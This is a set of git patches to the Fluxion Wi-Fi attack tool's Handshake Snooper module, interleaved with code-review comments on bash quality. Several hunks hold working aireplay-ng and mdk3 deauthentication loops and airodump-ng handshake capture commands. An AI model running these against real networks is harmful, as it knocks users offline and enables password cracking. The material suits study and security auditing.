handshake_snooper_unset_verifier_identifier - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") + local choices=( + "$FLUXIONHashVerificationMethodPyritOption" + "$FLUXIONHashVerificationMethodAircrackOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@] echo case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng" ;; - 
"$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_identifier - return 1 - ;; + "$FLUXIONHashVerificationMethodPyritOption") + HANDSHAKEVerifierIdentifier="pyrit" ;; + "$FLUXIONHashVerificationMethodAircrackOption") + HANDSHAKEVerifierIdentifier="aircrack-ng" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_identifier + return 1 + ;; esac } -function handshake_snooper_unset_verifier_interval() { +handshake_snooper_unset_verifier_interval() { HANDSHAKEVerifierInterval="" } -function handshake_snooper_set_verifier_interval() { +handshake_snooper_set_verifier_interval() { if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi handshake_snooper_unset_verifier_interval 
@@ -207,39 +261,92 @@ function handshake_snooper_set_verifier_interval() { io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30 ;; - "$HandshakeSnooperVerifierInterval60SOption") HANDSHAKEVerifierInterval=60 ;; - "$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90 ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_interval - return 1 - ;; + "$HandshakeSnooperVerifierInterval30SOption") + HANDSHAKEVerifierInterval=30 ;; + "$HandshakeSnooperVerifierInterval60SOption") + HANDSHAKEVerifierInterval=60 ;; + "$HandshakeSnooperVerifierInterval90SOption") + HANDSHAKEVerifierInterval=90 ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_interval + return 1 + ;; esac } -function handshake_snooper_unset_verifier_synchronicity() { +handshake_snooper_unset_verifier_synchronicity() { HANDSHAKEVerifierSynchronicity="" } -function handshake_snooper_set_verifier_synchronicity() { +handshake_snooper_set_verifier_synchronicity() { if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi handshake_snooper_unset_verifier_synchronicity - local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption") + local choices=( + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption" + "$HandshakeSnooperVerifierSynchronicitySynchronousOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking" ;; - "$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_synchronicity - return 1 - ;; + 
"$HandshakeSnooperVerifierSynchronicityAsynchronousOption") + HANDSHAKEVerifierSynchronicity="non-blocking" ;; + "$HandshakeSnooperVerifierSynchronicitySynchronousOption") + HANDSHAKEVerifierSynchronicity="blocking" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_synchronicity + return 1 + ;; esac } -function unprep_attack() { + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$HandshakeSnooperCLIArguments" ]; then + if ! HandshakeSnooperCLIArguments=$(getopt --options="b:e:c:v:i:j:a" --longoptions="bssid:,essid:,channel:,verifier:,interval:,jammer:,asynchronous" --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@") + then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 + fi + + declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments + + eval set -- "$HandshakeSnooperCLIArguments" # Set environment parameters. 
+fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "--" ]; do + case "$1" in + -b|--bssid) APTargetMAC=$2; shift;; + -e|--essid) APTargetSSID=$2; shift;; + -c|--channel) APTargetChannel=$2; shift;; + -v|--verifier) HANDSHAKEVerifierIdentifier=$2; shift;; + -i|--interval) HANDSHAKEVerifierInterval=$2; shift;; + -j|--jammer) exit;; + -a|--asynchronous) HANDSHAKEVerifierSynchronicity="non-blocking";; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done +} + +unprep_attack() { HandshakeSnooperState="Not Ready" handshake_snooper_unset_verifier_synchronicity 
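Review bot: In the option loop added under "Argument Loaded Configurables", `--verifier` and `--interval` are stored verbatim, and the `handshake_snooper_set_verifier_*` functions return 0 as soon as their variable is non-empty, so a value given on the command line is never checked against the choices the menus offer. Validate where the value is assigned, e.g. `[[ $2 =~ ^[0-9]+$ ]] || exit 10` before setting the interval, and a `case "$2" in pyrit|aircrack-ng)` test for the verifier. The same holds for `-b`/`-e`/`-c` here and for the matching options added to fluxion's own parser in PATCH 14/45 (`@@ -105,6 +105,9 @@`). A MAC-address and channel format check belongs at the point of assignment, because other hunks on this page expand those values unquoted on command lines in a script that insists on running as root.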
@@ -250,39 +357,29 @@ function unprep_attack() { sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" } -function prep_attack() { +prep_attack() { mkdir -p "$FLUXIONWorkspacePath/capture" - while true; do - handshake_snooper_set_deauthenticator_identifier - if [ $? -ne 0 ]; then break; fi - handshake_snooper_set_verifier_identifier - if [ $? -ne 0 ]; then - handshake_snooper_unset_deauthenticator_identifier - continue - fi - handshake_snooper_set_verifier_interval - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_identifier - continue - fi - handshake_snooper_set_verifier_synchronicity - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_interval - continue - fi - HandshakeSnooperState="Ready" - break - done + IOUtilsHeader="handshake_snooper_header" - # Check for handshake abortion. - if [ "$HandshakeSnooperState" != "Ready" ]; then + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( + "set_deauthenticator_identifier" + "set_verifier_identifier" + "set_verifier_interval" + "set_verifier_synchronicity" + ) + + if fluxion_do_sequence handshake_snooper sequence[@]; then + HandshakeSnooperState="Ready" + else unprep_attack return 1 fi } -function stop_attack() { +stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then kill -s SIGABRT $HANDSHAKEArbiterPID &>$FLUXIONOutputDevice fi @@ -292,12 +389,12 @@ function stop_attack() { HandshakeSnooperState="Stopped" } -function start_attack() { +start_attack() { if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi HandshakeSnooperState="Running" - handshake_snooper_arbiter_daemon $$ &>$FLUXIONOutputDevice & + handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice & HANDSHAKEArbiterPID=$! } diff --git a/fluxion b/fluxion index cba1b78..da23d2e 100755 --- a/fluxion +++ b/fluxion 
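Review bot: The comment added above `local sequence=(` in `prep_attack` ("Removed read-only due to local constant shadowing bug. I've reported the bug, we can add it when fixed.") names neither the bug nor the report. The old side of this function never declared such an array, so a reader cannot tell what was removed or when `-r` may come back. State the failure concretely, e.g. `# Not 'local -r': <observed error message>, see <link to the report>`, with the real message and link filled in. The same comment is repeated in the `fluxion_undo`, `fluxion_do_sequence` and `fluxion_main` hunks of the `fluxion` section that follows; write the explanation once and refer to it from the others.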
@@ -174,7 +174,7 @@ declare -r InstallerUtilsNoticeMark="$FLUXIONVLine" declare -r PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" -declare -r IOUtilsHeader="fluxion_header" +declare IOUtilsHeader="fluxion_header" declare -r IOUtilsQueryMark="$FLUXIONVLine" declare -r IOUtilsPrompt="$FLUXIONPrompt" @@ -483,7 +483,9 @@ fluxion_undo() { local -r __fluxion_undo__namespace=$1 - eval local -r __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + eval local __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) local __fluxion_undo__i for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ @@ -528,7 +530,10 @@ fluxion_do_sequence() { # defined above, including updating the namespace tracker. local -r __fluxion_do_sequence__namespace=$1 - local -r __fluxion_do_sequence__sequence=("${!2}") + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local __fluxion_do_sequence__sequence=("${!2}") if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then return -2 @@ -1386,6 +1391,8 @@ fluxion_unprep_attack() { unprep_attack fi + IOUtilsHeader="fluxion_header" + return 1 # Trigger another undo since prep isn't significant. } @@ -1415,10 +1422,7 @@ fluxion_prep_attack() { fi fi - if ! prep_attack "$@"; then - fluxion_unprep_attack - return 1 - fi + if ! prep_attack "$@"; then return 6; fi } fluxion_run_attack() { @@ -1515,7 +1519,9 @@ fluxion_main() { fluxion_set_resolution - local -r sequence=( + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( "set_language" "set_attack" "prep_attack" From 7c0af0586054109fdc6f565db8db4a3b78e423d4 Mon Sep 17 00:00:00 2001 
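Review bot: `eval local __fluxion_undo__history=\(…\)` in the `fluxion_undo` hunk builds shell source from `$__fluxion_undo__namespace`, so every character of the namespace argument is parsed as code. The callers visible on this page pass fixed names, so this is hardening rather than an open hole. Indirect expansion, which `fluxion_do_sequence` already uses in `("${!2}")`, does the same without `eval`: `local __fluxion_undo__ref="FXDLog_$__fluxion_undo__namespace[@]"` followed by `local __fluxion_undo__history=("${!__fluxion_undo__ref}")`. The `fluxion_undo` hunks of PATCH 14/45 contain more `eval` lines of the same shape, and the undo dispatch there can be a plain call: `if "${__fluxion_undo__namespace}_${FLUXIONUndoable[$__fluxion_undo__command]}_$__fluxion_undo__identifier"; then`. `fluxion_undo` begins outside this hunk.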
From: Matias Barcenas Date: Tue, 16 Jan 2018 23:09:09 -0600 Subject: [PATCH 14/45] Global targetting & framework bug fixes. Targetting is now done via either "visual" interface or CLI flags. Fixed bugs with the undo sequencing in the sequencing framework. --- fluxion | 142 ++++++++++++++++++++++++++++++++++++++++++++------------ 1 file changed, 113 insertions(+), 29 deletions(-) diff --git a/fluxion b/fluxion index da23d2e..26729a8 100755 --- a/fluxion +++ b/fluxion @@ -78,8 +78,8 @@ source lib/HashUtils.sh # =================== < Parse Parameters > =================== # # ============================================================ # if ! FLUXIONCLIArguments=$( - getopt --options="vdkrnmtl:a:" \ - --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" \ + getopt --options="vdkrnmtb:e:c:l:a:" \ + --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 @@ -105,6 +105,9 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; + -b|--bssid) FluxionTargetMAC=$2; shift;; + -e|--essid) FluxionTargetSSID=$2; shift;; + -c|--channel) FluxionTargetChannel=$2; shift;; -l|--language) FluxionLanguage=$2; shift;; -a|--attack) FluxionAttack=$2; shift;; esac @@ -473,6 +476,8 @@ fluxion_do() { local -r __fluxion_do__namespace=$1 local -r __fluxion_do__identifier=$2 + # Notice, the instruction will be adde to the Do Log + # regardless of whether it succeeded or failed to execute. eval FXDLog_$__fluxion_do__namespace+=\("$__fluxion_do__identifier"\) eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}" return $? 
@@ -487,6 +492,9 @@ fluxion_undo() { # I've reported the bug, we can add it when fixed. eval local __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) + eval echo \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice + local __fluxion_undo__i for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ __fluxion_undo__i > 0; __fluxion_undo__i-- )); do @@ -494,8 +502,13 @@ fluxion_undo() { local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} - if ! eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + echo "Do ${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier" \ + > $FLUXIONOutputDevice + if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + echo "Undo-chain succeded." > $FLUXIONOutputDevice eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) + eval echo History\: \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice return 0 fi done 
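Review bot: The trace lines added to `fluxion_undo` redirect with an unquoted `> $FLUXIONOutputDevice`; if that variable is ever empty or contains whitespace, bash reports an ambiguous redirect and does not run the command. Its assignment is outside these hunks, so confirm it is always set, and quote the target: `> "$FLUXIONOutputDevice"`. The message `"Undo-chain succeded."` in the second hunk is misspelled ("succeeded"). The same unquoted redirect recurs in the `fluxion_do_sequence` hunk that follows and in the `handshake_snooper_set_jammer_interface` hunks of PATCH 16/45 and 17/45.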
@@ -542,30 +555,36 @@ fluxion_do_sequence() { local -A __fluxion_do_sequence__index=() local i - for i in $(seq ${#__fluxion_do_sequence__sequence[@]}); do - __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i-1]}"]=$i + for i in $(seq 0 $((${#__fluxion_do_sequence__sequence[@]} - 1))); do + __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i]}"]=$i done # Start sequence with the first instruction available. + local __fluxion_do_sequence__instructionIndex=0 local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then - if ! fluxion_undo $__fluxion_do_sequence__namespace; then $__fluxion_do_sequence__namespace + if ! fluxion_undo $__fluxion_do_sequence__namespace; then break fi + + # Synchronize the current instruction's index by checking last. + if ! fluxion_done $__fluxion_do_sequence__namespace; then + return -3; + fi + + __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} + + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then + return -4 + fi + else + let __fluxion_do_sequence__instructionIndex++ fi - if ! fluxion_done $__fluxion_do_sequence__namespace; then - return -3; - fi - - local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} - - if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then - return -4 - fi - - __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence["$__fluxion_do_sequence__instructionIndex"]} + __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[$__fluxion_do_sequence__instructionIndex]} + echo "Next Instruction: $__fluxion_do_sequence__instruction" \ + > $FLUXIONOutputDevice done } 
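Review bot: The index loop in `fluxion_do_sequence` forks `seq` and does arithmetic only to enumerate the array's own indices; `for i in "${!__fluxion_do_sequence__sequence[@]}"; do` yields the same 0-based indices without a subprocess or unquoted command substitution. `let __fluxion_do_sequence__instructionIndex++` is the legacy spelling; `__fluxion_do_sequence__instructionIndex=$((__fluxion_do_sequence__instructionIndex + 1))` avoids `let` returning a non-zero status when the expression evaluates to 0. The function starts before this hunk.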
@@ -1332,7 +1351,9 @@ fluxion_hash_get() { # ================== < Attack Subroutines > ================== # fluxion_unset_attack() { + local -r attackWasSet=${FluxionAttack:+1} FluxionAttack="" + if [ ! "$attackWasSet" ]; then return 1; fi } fluxion_set_attack() { 
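Review bot: `fluxion_unset_attack` now returns 1 when nothing was set, but the hunk does not say why. Going by `fluxion_undo`, which stops at the first undo step that returns 0, this status is what makes the undo chain keep walking back. Add a comment above the guard, e.g. `# Nothing to undo here: return 1 so fluxion_undo continues with the previous step.` The same uncommented guard is added to the `handshake_snooper_unset_*` functions in PATCH 16/45 and to `fluxion_hash_unset_path` in PATCH 17/45.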
@@ -1386,6 +1407,78 @@ fluxion_set_attack() { FluxionAttack=${IOQueryFormatFields[0]} } +fluxion_unset_attack_target() { + FluxionTargetMAC="" + FluxionTargetSSID="" + FluxionTargetChannel="" + + FluxionTargetEncryption="" + + FluxionTargetMakerID="" + FluxionTargetMaker="" + + FluxionTargetSSIDClean="" + + FluxionTargetRogueMAC="" + + return 1 # To trigger undo-chain. +} + +fluxion_set_attack_target() { + # Check if attack is targetted & set the attack target if so. + if ! type -t attack_targetting_interfaces &> /dev/null; then + return 1 + fi + + if [ \ + "$FluxionTargetSSID" -a \ + "$FluxionTargetMAC" -a \ + "$FluxionTargetChannel" \ + ]; then + fluxion_header + fluxion_target_show + echo + echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" + + # TODO: This doesn't translate choices to the selected language. + while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do + echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " + local choice + read choice + if [ ! "$choice" ]; then break; fi + done + + echo -ne "\n\n" + + if [ "${choice,,}" != "n" ]; then + return 0 + fi + elif [ \ + "$FluxionTargetSSID" -o \ + "$FluxionTargetMAC" -o \ + "$FluxionTargetChannel" \ + ]; then + # TODO: Survey environment here to autofill missing fields. + # In other words, if a user gives incomplete information, scan + # the environment based on either the ESSID or BSSID, & autofill. + echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" + sleep 3 + fi + + if ! fluxion_get_interface attack_targetting_interfaces; then + return 2 + fi + + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 3 + fi + + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 4 + fi +} + fluxion_unprep_attack() { if type -t unprep_attack &> /dev/null; then unprep_attack 
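Review bot: In `fluxion_set_attack_target` the confirmation loop tests `$choice` before `local choice` has run, so the first pass reads whatever `choice` a caller or the global scope holds. A stale `y` there skips the prompt entirely. Declare it ahead of the loop with `local choice=""` and read with `read -r choice`; the test itself needs no pipeline: `while [[ ! $choice =~ ^[ynYN]$ ]]; do`. The `[ … -a … ]` and `[ … -o … ]` tests above it use the obsolescent form and are safer as `[[ … && … ]]` and `[[ … || … ]]`.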
@@ -1408,21 +1501,12 @@ fluxion_prep_attack() { source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" - # Check if attack is targetted & set the attack target. + # Check if attack is targetted & set the attack target if so. if type -t attack_targetting_interfaces &> /dev/null; then - if ! fluxion_get_interface attack_targetting_interfaces; then - return 3 - fi - if ! fluxion_allocate_interface $FluxionInterfaceSelected; then - return 4 - fi - if ! fluxion_get_target \ - ${FluxionInterfaces[$FluxionInterfaceSelected]}; then - return 5 - fi + if ! fluxion_set_attack_target; then return 3; fi fi - if ! prep_attack "$@"; then return 6; fi + if ! prep_attack "$@"; then return 4; fi } fluxion_run_attack() { From e37c200989b674c25388dcda2cb2a8b8612c841e Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 16 Jan 2018 23:14:04 -0600 Subject: [PATCH 15/45] Fixed parameter bug & removed localized targetting. --- attacks/Handshake Snooper/attack.sh | 26 +++++++++++++++----------- 1 file changed, 15 insertions(+), 11 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 2f9aff3..88b295b 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh 
@@ -308,8 +308,12 @@ handshake_snooper_set_verifier_synchronicity() { # =================== < Parse Parameters > =================== # # ============================================================ # if [ ! "$HandshakeSnooperCLIArguments" ]; then - if ! HandshakeSnooperCLIArguments=$(getopt --options="b:e:c:v:i:j:a" --longoptions="bssid:,essid:,channel:,verifier:,interval:,jammer:,asynchronous" --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@") - then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 + if ! HandshakeSnooperCLIArguments=$( + getopt --options="v:i:j:a" \ + --longoptions="verifier:,interval:,jammer:,asynchronous" \ + --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 fi declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments 
@@ -321,20 +325,20 @@ fi # ============================================================ # # ============= < Argument Loaded Configurables > ============ # # ============================================================ # -while [ "$1" != "--" ]; do +while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in - -b|--bssid) APTargetMAC=$2; shift;; - -e|--essid) APTargetSSID=$2; shift;; - -c|--channel) APTargetChannel=$2; shift;; - -v|--verifier) HANDSHAKEVerifierIdentifier=$2; shift;; - -i|--interval) HANDSHAKEVerifierInterval=$2; shift;; - -j|--jammer) exit;; - -a|--asynchronous) HANDSHAKEVerifierSynchronicity="non-blocking";; + -v|--verifier) + HandshakeSnooperVerifierIdentifier=$2; shift;; + -i|--interval) + HandshakeSnooperVerifierInterval=$2; shift;; + -j|--jammer) + HandshakeSnooperJammerInterface=$2; shift;; + -a|--asynchronous) + HandshakeSnooperVerifierSynchronicity="non-blocking";; esac shift # Shift new parameters done - # ============================================================ # # ===================== < Fluxion Hooks > ==================== # # ============================================================ # From 304939d0b9e146d7b56318670dc052fc9a8b3317 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 00:33:22 -0600 Subject: [PATCH 16/45] Upgraded Handshake Snooper attack plus bug fixes. Finished upgrading Handshake Snooper for Fluxion V4. Updated Handshake Snooper Fluxion service globals to newer identifiers. Added back-track checking to undo functions. Added Jammer interface selection step to Handshake Snooper sequence. Fixed bug failing to return error code with Fluxion's sequencing framework. --- attacks/Handshake Snooper/attack.sh | 60 ++++++++++++++++++++++------- fluxion | 2 +- language/en.sh | 10 ++++- 3 files changed, 56 insertions(+), 16 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 88b295b..283fa15 100755 --- a/attacks/Handshake Snooper/attack.sh 
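Review bot: The rewritten option loop assigns `HandshakeSnooperVerifierIdentifier`, `HandshakeSnooperVerifierInterval` and `HandshakeSnooperVerifierSynchronicity`, while the `handshake_snooper_set_verifier_*` functions shown elsewhere on this page test and set `HANDSHAKEVerifierIdentifier`, `HANDSHAKEVerifierInterval` and `HANDSHAKEVerifierSynchronicity`. Unless the consumers are renamed in a part of the file not shown here, `-v`, `-i` and `-a` now store values that nothing reads. Use one spelling on both sides, e.g. `-i|--interval) HANDSHAKEVerifierInterval=$2; shift;;`. The loop condition is better written `[ "$1" != "" ] && [ "$1" != "--" ]`, since `-a` inside `[` is obsolescent.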
+++ b/attacks/Handshake Snooper/attack.sh @@ -94,7 +94,7 @@ handshake_snooper_arbiter_daemon() { "$FLUXIONWorkspacePath/handshake_snooper.log" hash_check_handshake "$HANDSHAKEVerifierIdentifier" \ "$FLUXIONWorkspacePath/capture/recent.cap" \ - "$APTargetSSID" "$APTargetMAC" + "$FluxionTargetSSID" "$FluxionTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. @@ -122,7 +122,7 @@ handshake_snooper_arbiter_daemon() { # Move handshake to storage if one was acquired. mv "$FLUXIONWorkspacePath/capture/recent.cap" \ - "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" + "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" # Signal parent process the verification terminated. kill -s SIGABRT $1 @@ -142,9 +142,9 @@ handshake_snooper_start_captor() { handshake_snooper_stop_captor - xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" \ + xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $FluxionTargetChannel)" \ $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ - airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & + airodump-ng --ignore-negative-one -d $FluxionTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $FluxionTargetChannel -a $HandshakeSnooperJammerInterface & local parentPID=$! while [ ! "$HANDSHAKECaptorPID" ]; do 
@@ -170,27 +170,29 @@ handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in "$HandshakeSnooperMdk3MethodOption") - echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in "$HandshakeSnooperAireplayMethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ - -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" & HANDSHAKEDeauthenticatorPID=$! ;; "$HandshakeSnooperMdk3MethodOption") xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ - -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" & HANDSHAKEDeauthenticatorPID=$! ;; esac } + handshake_snooper_unset_deauthenticator_identifier() { + if [ ! "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 1; fi HANDSHAKEDeauthenticatorIdentifier="" } 
@@ -218,7 +220,35 @@ handshake_snooper_set_deauthenticator_identifier() { fi } +handshake_snooper_unset_jammer_interface() { + if [ ! "$HandshakeSnooperJammerInterface" ]; then return 1; fi + HandshakeSnooperJammerInterface="" + + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) + + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi +} + +handshake_snooper_set_jammer_interface() { + if [ "$HandshakeSnooperJammerInterface" ]; then return 0; fi + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi + + echo "Running get interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces; then + echo "Failed to get interface" > $FLUXIONOutputDevice + return 1 + fi + + echo "Succeeded get interface." > $FLUXIONOutputDevice + HandshakeSnooperJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} +} + handshake_snooper_unset_verifier_identifier() { + if [ ! "$HANDSHAKEVerifierIdentifier" ]; then return 1; fi HANDSHAKEVerifierIdentifier="" } @@ -249,6 +279,7 @@ handshake_snooper_set_verifier_identifier() { } handshake_snooper_unset_verifier_interval() { + if [ ! "$HANDSHAKEVerifierInterval" ]; then return 1; fi HANDSHAKEVerifierInterval="" } @@ -275,6 +306,7 @@ handshake_snooper_set_verifier_interval() { } handshake_snooper_unset_verifier_synchronicity() { + if [ ! "$HANDSHAKEVerifierSynchronicity" ]; then return 1; fi HANDSHAKEVerifierSynchronicity="" } 
@@ -370,22 +402,22 @@ prep_attack() { # I've reported the bug, we can add it when fixed. local sequence=( "set_deauthenticator_identifier" + "set_jammer_interface" "set_verifier_identifier" "set_verifier_interval" "set_verifier_synchronicity" ) - if fluxion_do_sequence handshake_snooper sequence[@]; then - HandshakeSnooperState="Ready" - else - unprep_attack + if ! fluxion_do_sequence handshake_snooper sequence[@]; then return 1 fi + + HandshakeSnooperState="Ready" } stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then - kill -s SIGABRT $HANDSHAKEArbiterPID &>$FLUXIONOutputDevice + kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice fi HANDSHAKEArbiterPID="" diff --git a/fluxion b/fluxion index 26729a8..f52bb1e 100755 --- a/fluxion +++ b/fluxion @@ -565,7 +565,7 @@ fluxion_do_sequence() { while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then if ! fluxion_undo $__fluxion_do_sequence__namespace; then - break + return -2 fi # Synchronize the current instruction's index by checking last. diff --git a/language/en.sh b/language/en.sh index 